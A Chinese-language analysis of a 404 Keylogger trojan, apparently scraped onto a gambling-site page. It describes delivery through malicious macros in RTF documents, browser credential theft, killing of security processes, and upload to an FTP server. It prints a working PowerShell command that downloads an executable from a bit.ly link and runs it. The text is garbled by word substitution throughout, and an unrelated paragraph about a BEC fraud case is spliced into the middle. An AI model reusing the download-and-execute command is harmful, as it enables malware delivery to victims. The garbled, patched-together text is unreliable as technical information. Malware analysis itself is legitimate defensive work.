欢迎访问Sunbet官网(www.sunbet.us),Allbet欧博官网(www.ALLbetgame.us)!

首页Sunbet_安全防护正文

404 Keylogger最新木马,偷取受害者浏览器网站帐号和暗码

b9e08c31ae1faa592019-12-1467系统安全

近日深佩服平安团队捕获到一个最新的404 Keylogger木马变种,经由过程OFFICE文档嵌入歹意宏代码举行流传,偷取受害者浏览器的网站帐号和暗码,深佩服平安团队对此样本举行了详细剖析,并猎取到了黑客FTP服务器的帐号和暗码,请人人进步平安意识,不要随意马虎翻开未知的邮件附件及文档等。

样本是一个RTF文档,内里嵌套了OLE对象,包括歹意宏代码,以下所示:

404 Keylogger最新木马,偷取受害者浏览器网站帐号和暗码  系统安全 第1张

歹意宏代码,会启动PowerShell历程,从长途服务器上下载歹意顺序,然后实行,相干参数,以下:

powershell (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/2P7EoT7 ” , ”$ENv:teMp\4235.exe” ) ; stARt ”$ENv:tEMP\4235.exe”
剖析下载的歹意顺序,运用NET言语举行开发,首先会猎取长途服务器地点:hxxps://paste.ee/r/RrkBF,以下所示:  
一次成功利用了相似域的精准BEC攻击 9月9日,汽车零部件制造商丰田纺织(Toyota Boshoku Corporation)报告了一起BEC诈骗(商业邮件诈骗,Business Email Compromise,简称BEC),其中一家欧洲子公司损失了超过3700万美元。BEC攻击非常容易成功,因为欺诈者通常会谨慎选择攻击目标,例如可靠的业务合作伙伴或公司的CEO。BEC攻击主要依赖于社会工程学,向特定目标发送钓鱼邮件,达到攻击目的。 想象一下,如果你是一家初创公司的老板,正在等待一百万美元的种子轮融资,但它却从未出现在你的银行账户上。再或者,假如你是一家风险投资公司的老板,你认为自己已经将投资基金转到投资合作中的另一家初创公司,但这些资金却从未出现在对方的账户中。 以下是今年早些时候由Check Point突发事件应对团队(CP IRT)调查的一个真实案例 一家中国风险投资公司被他们的转账银行提醒,他们最近的一笔

该顺序主要功能是键盘纪录,偷取受害者浏览器网站上的帐号和暗码,会完毕受害者主机上的浏览器相干历程,以下所示:

匹敌杀软,完毕相干平安软件历程,相干的平安软件历程有一百多个,以下所示:

404 Keylogger最新木马,偷取受害者浏览器网站帐号和暗码  系统安全 第2张

将纪录的浏览器上网站,以及相干的帐号和暗码,然后发送到黑客长途FTPd服务器,以下所示:

404 Keylogger最新木马,偷取受害者浏览器网站帐号和暗码  系统安全 第3张

该歹意顺序另有截屏等操纵,在剖析该歹意顺序的时刻发明了黑客的FTP服务器地点,以及帐号和暗码,登录进去,发明它已偷取了部份受害者的主机信息,以下所示:

404 Keylogger最新木马,偷取受害者浏览器网站帐号和暗码  系统安全 第4张

解决方案

病毒防备

1、实时给电脑打补丁,实时升级应用顺序,修复破绽。

2、不要点击来源不明的邮件附件,不从不明网站下载软件。

末了,发起企业对全网举行一次平安搜检和杀毒扫描,增强防护事情。

原文地点: https://www.4hou.com/system/22080.html

网友评论